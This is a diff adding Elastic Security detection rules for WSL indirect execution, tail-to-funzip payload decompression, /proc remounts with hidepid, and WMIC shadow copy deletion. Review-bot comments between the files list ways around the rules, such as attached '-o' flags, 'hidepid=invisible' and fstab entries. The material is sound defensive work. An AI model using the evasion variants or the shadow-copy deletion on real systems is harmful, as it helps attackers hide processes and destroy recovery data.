{ + "framework": "MITRE ATT&CK", + 
"tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_5.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_5.json new file mode 100644 index 00000000000..ddb4f8680f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_5.json 
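Review bot: The exclusions `"?:\\Program Files (x86)\\*"` and `"?:\\Program Files\\*"` in `query` allow-list every executable under both Program Files trees, which also makes the more specific `?:\\Program Files*\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux_*\\wsl*.exe` entry redundant since it is already covered. Any binary an attacker can drop or side-load into a writable Program Files subdirectory (vendor folders with loose ACLs are not rare) and then launch through `wsl.exe`/`wslhost.exe` is therefore exempt from the detection. Consider narrowing the two broad prefixes to the specific interop binaries the rule actually needs to tolerate, or at least pairing them with a signature condition such as `not (process.executable : ("?:\\Program Files (x86)\\*", "?:\\Program Files\\*") and process.code_signature.trusted == true)`, noting that the latter would add `process.code_signature.trusted` to `required_fields`.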
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the \"-c\" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Content Extracted or Decompressed via Funzip", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n((process.args == \"tail\" and process.args == \"-c\" and process.args == \"funzip\")) and\nnot process.args : \"/var/log/messages\" and \nnot process.parent.executable : (\"/usr/bin/dracut\", \"/sbin/dracut\", \"/usr/bin/xargs\") and\nnot (process.parent.name in (\"sh\", \"sudo\") and process.parent.command_line : \"*nessus_su*\")\n", + "references": [ + "https://attack.mitre.org/software/S0482/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dc0b7782-0df0-47ff-8337-db0d678bdb66", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated 
into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "dc0b7782-0df0-47ff-8337-db0d678bdb66_5", + "type": "security-rule" +} \ No newline at end of file 
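Review bot: The `query` condition `process.args == "tail" and process.args == "-c" and process.args == "funzip"` only matches when all three tokens land in a single process's argument list, i.e. a `sh -c "tail -c … | funzip"` style launch; when the same pipeline runs from a script or an interactive shell, `tail` and `funzip` are separate processes and neither carries the other's name, so the rule stays silent. If that is intentional (matching the Bundlore dropper's one-shot shell invocation), a sentence in `description` or a `note` saying so would help analysts understand the coverage; otherwise a `sequence by process.parent.entity_id` joining a `tail -c` start with a `funzip` start would cover both forms. Separately, the `setup` text links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html` while every other link in the same text uses `current`; pin the links consistently so the guide does not go stale on one version.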
diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_6.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_6.json new file mode 100644 index 00000000000..a6476b1f6c8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_6.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Hidden Process via Mount Hidepid", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and event.type == \"start\" \nand process.name == \"mount\" and process.args == \"/proc\" and process.args == \"-o\" and process.args : \"*hidepid=2*\"\n", + "references": [ + "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"dc71c186-9fe4-4437-a4d0-85ebb32b8204", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_7.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_7.json new file mode 100644 index 00000000000..41515a59147 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_7.json 
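Review bot: The `query` matches only `process.args : "*hidepid=2*"`, but since Linux 5.8 the procfs mount option also accepts the symbolic aliases `hidepid=invisible` (same as 2) and `hidepid=ptraceable`/`hidepid=4` (stricter), so `mount -o remount,hidepid=invisible /proc` achieves the described evasion without triggering this rule. In the same clause `process.args == "-o"` requires the option flag to be a separate token, so the attached form `mount -oremount,hidepid=2 /proc` is also missed. Widening to `process.args : ("*hidepid=2*", "*hidepid=4*", "*hidepid=invisible*", "*hidepid=ptraceable*")` and dropping the `-o` equality in favour of matching the option string itself would close both gaps; the version 7 snapshot that follows carries the same `hidepid=2`-only pattern. Persistence via an `/etc/fstab` entry is a different data source and is presumably out of scope, but the `description` could say so.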
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Hidden Process via Mount Hidepid", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"mount\" and process.args == \"/proc\" and process.args == \"-o\" and\nprocess.args : \"*hidepid=2*\"\n", + "references": [ + "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"dc71c186-9fe4-4437-a4d0-85ebb32b8204", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_8.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_8.json new file mode 100644 index 00000000000..8b54abb6da4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_8.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Hidden Process via Mount Hidepid", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"mount\" and process.args == \"/proc\" and process.args == \"-o\" and\nprocess.args : \"*hidepid=2*\"\n", + "references": [ + "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"dc71c186-9fe4-4437-a4d0-85ebb32b8204", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_109.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_109.json new file mode 100644 index 00000000000..79bf3b10d08 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_109.json 
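Review bot: The `query` only fires when `-o` is its own argv element and the option string contains the literal `hidepid=2`, so the equivalent remount `mount -oremount,hidepid=2 /proc`, the long form `--options remount,hidepid=2`, and — on kernels that accept the symbolic spelling (5.8 and later as far as I recall; worth confirming) — `hidepid=invisible` all slip past, as does putting the option in `/etc/fstab` and applying it with `mount -a` or a plain `mount -o remount /proc`. A tighter predicate on the same fields would be `process.args : ("-o*", "--options*") and process.args : ("*hidepid=2*", "*hidepid=invisible*")`. Since `hidepid=2` is also a common hardening setting, the `description` should say that configuration-management remounts are an expected false-positive source and that the fstab route is not covered; its "(or RHEL/CentOS v6.5+ above)" is also garbled and should read "or RHEL/CentOS 6.5 and later". The `_7` snapshot in this same change carries the identical query and wording.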
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via WMIC", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch 
activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"WMIC.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"delete\" and process.args : \"shadowcopy\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_110.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_110.json new file mode 100644 index 00000000000..2ba2f3793f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_110.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via WMIC", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch 
activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems 